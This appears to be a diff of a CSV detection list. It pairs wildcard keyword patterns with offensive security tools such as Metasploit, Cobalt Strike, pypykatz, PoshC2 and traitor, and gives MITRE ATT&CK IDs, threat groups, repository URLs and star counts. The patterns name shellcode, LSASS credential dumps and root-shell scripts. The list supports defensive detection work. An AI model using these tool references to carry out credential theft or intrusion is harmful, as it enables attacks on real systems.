TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*_dump_users.lst*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" -"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*_EvilClippy.*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" -"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*_find_sharpgen_dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*_GetNetLoggedon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*_lsass.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*_lsassdecrypt.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*_mouse_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_msfvenom*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_nimplant_*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*_peloader.dll*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_posh-common*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*_prefix_PEzor_*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*_pycobalt_*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*_Shellcode.bin*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*_tcp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*_udp_cc2(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" -"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*{process_to_inject}.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" "*| favfreak*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*| hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*|base64 -d > /tmp/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*~/.csexec*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*< /dev/console | uudecode && uncompress*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd 